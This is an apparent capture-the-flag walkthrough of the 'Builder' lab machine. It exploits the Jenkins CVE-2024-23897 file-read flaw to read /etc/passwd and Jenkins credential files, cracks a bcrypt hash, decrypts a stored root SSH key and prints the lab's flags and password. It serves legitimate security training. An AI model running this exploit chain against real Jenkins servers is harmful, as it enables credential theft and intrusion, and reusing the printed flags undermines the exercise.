Command Palette

Search for a command to run...

Blog
PreviousNext

Builder - Walkthrough

Builder is a medium-difficulty Linux machine that features a Jenkins instance. The Jenkins instance is found to be vulnerable to the CVE-2024-23897 vulnerability that allows unauthenticated users to read arbitrary files on the Jenkins controller file system. An attacker is able to extract the username and password hash of the Jenkins user jennifer. Using the credentials to login into the remote Jenkins instance, an encrypted SSH key is exploited to obtain root access on the host machine.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- -n -Pn --disable-arp-ping -sS -sV -sC -vvv -T5 10.10.11.10 -oN builder.nmap

The scan reveals:

PORTSTATESERVICEVERSION
22/tcpopensshOpenSSH 8.9p1
8080/tcpopenhttpJetty 10.0.18

Jenkins 2.441

The web service is running Jenkins 2.441.

Foothold

Jenkins 2.441 is vulnerable to CVE-2024-23897, an arbitrary file read vulnerability. We download the Jenkins CLI:

wget http://10.10.11.10:8080/jnlpJars/jenkins-cli.jar

We verify the vulnerability by reading /etc/passwd:

java -jar jenkins-cli.jar -noCertificateCheck -s 'http://10.10.11.10:8080' help "@/etc/passwd"
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

The vulnerability is confirmed. We read the Jenkins user configuration:

java -jar jenkins-cli.jar -noCertificateCheck -s 'http://10.10.11.10:8080' connect-node "@/var/jenkins_home/users/users.xml"

This reveals a user: jennifer_12108429903186576833

We extract the user's config file:

java -jar jenkins-cli.jar -noCertificateCheck -s 'http://10.10.11.10:8080' connect-node "@/var/jenkins_home/users/jennifer_12108429903186576833/config.xml"
<passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>

We crack the bcrypt hash with John:

john hash -w=/usr/share/wordlists/rockyou.txt
UsernamePassword
jenniferprincess

We authenticate to Jenkins:

Authenticated Jenkins

Privilege Escalation

Once authenticated, we can abuse Jenkins to read the encrypted SSH private key stored in credentials. We use the Script Console to decrypt it:

println( hudson.util.Secret.decrypt("{ENCRYPTED_KEY_HERE}") )

This decrypts root's SSH private key. We save it and connect:

chmod 600 id_rsa
ssh -i id_rsa [email protected]

Root shell obtained:

cat /root/root.txt

Root flag: 271070df799e28e6ff721ac5a9c374e9

User flag:

su jennifer
cat /home/jennifer/user.txt

User flag: fa1c1629755c626f7d87673a0bcc6dc0